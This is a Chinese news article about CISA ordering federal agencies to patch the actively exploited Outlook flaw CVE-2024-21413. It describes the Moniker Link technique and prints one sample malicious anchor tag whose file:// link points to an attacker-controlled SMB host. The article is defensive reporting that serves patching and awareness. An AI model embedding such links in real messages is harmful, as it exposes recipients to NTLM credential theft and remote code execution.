美国网络安全和基础设施安全局（CISA）发布公告，要求联邦机构在三周内修复微软Outlook高危远程代码执行漏洞CVE-2024-21413。该漏洞由Check Point Research的安全专家发现，已被黑客利用发起攻击。攻击者可绕过保护视图，以编辑模式打开恶意Office文件，获得远程代码执行能力。利用Moniker Link安全方式，绕过Outlook内置的恶意链接保护，窃取NTLM凭据，通过恶意Office文档执行任意代码。CISA已将其添加到已知被利用漏洞目录，并建议私营机构优先修补此漏洞。

🚨 **高危漏洞警告**：美国CISA要求联邦机构在2月27日前修复微软Outlook远程代码执行漏洞CVE-2024-21413，该漏洞已被黑客积极利用。

🛡️ **绕过保护机制**：攻击者利用该漏洞可以绕过Outlook的保护视图，该视图本应以只读模式打开Office文件以阻止嵌入其中的有害内容，但漏洞允许攻击者以编辑模式打开恶意文件。

🔗 **Moniker Link攻击**：攻击者使用名为“Moniker Link”的安全方式，绕过Outlook内置的恶意链接保护，通过file://协议嵌入恶意URL，从而实现攻击。

🔑 **凭据窃取与代码执行**：黑客成功利用此漏洞后，可以窃取用户的NTLM凭据，并通过恶意制作的Office文档执行任意代码，对系统安全构成严重威胁。

IT之家 2 月 7 日消息，美国网络安全和基础设施安全局（CISA）本周四发布公告，要求美国联邦机构在 3 周内（2 月 27 日前）为其系统部署补丁，修复微软 Outlook 高危远程代码执行漏洞。

该漏洞由来自网络安全公司 Check Point Research 的安全专家 Haifei Li 率先发现，追踪编号为 CVE-2024-21413。

CISA 表示目前已经有证据表明，有黑客利用该漏洞发起攻击。攻击者可以绕过保护视图（该视图应以只读模式打开 Office 文件以阻止嵌入其中的有害内容），并以编辑模式打开恶意 Office 文件，从而获得远程代码执行能力。

攻击者利用名为“Moniker Link”的安全方式，绕过 Outlook 内置的恶意链接保护，使用 file:// 协议，并在指向攻击者控制服务器的 URL 中添加感叹号和随机文本（例如 "!something"），嵌入到电子邮件中。

IT之家附上示例如下：

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

CVE-2024-21413 影响多个 Office 产品，包括 Microsoft Office LTSC 2021、Microsoft 365 Apps for Enterprise、Microsoft Outlook 2016 和 Microsoft Office 2019。

黑客成功攻击后，可以窃取 NTLM 凭据，以及通过恶意制作的 Office 文档执行任意代码。CISA 已将此漏洞添加到其已知被利用漏洞 (KEV) 目录中，并将其标记为正在被积极利用。

CISA 强调，这类漏洞是恶意网络行为者常用的攻击途径，对联邦企业构成重大风险。虽然 CISA 主要关注提醒联邦机构尽快修补漏洞，但也建议私营机构优先修补这些漏洞，以阻止正在进行的攻击。